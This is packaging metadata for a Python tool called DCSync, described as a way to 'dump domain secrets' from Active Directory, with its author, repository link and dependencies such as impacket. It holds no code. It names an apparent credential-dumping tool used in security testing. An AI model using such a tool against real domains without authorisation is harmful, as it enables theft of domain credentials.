Metadata-Version: 2.1
Name: DCSync
Version: 0.0.1
Summary: Dump domain secrets.
Home-page: https://github.com/AetherBlack/DCSync
Author: Aether
License: GNU
Project-URL: Bug Tracker, https://github.com/AetherBlack/DCSync/issues
Keywords: dcsync ActiveDirectory AD
Classifier: Intended Audience :: Information Technology
Classifier: Programming Language :: Python :: 3
Requires-Python: >=3.6, <4
License-File: LICENSE
Requires-Dist: impacket
Requires-Dist: colorama
Requires-Dist: pycryptodome
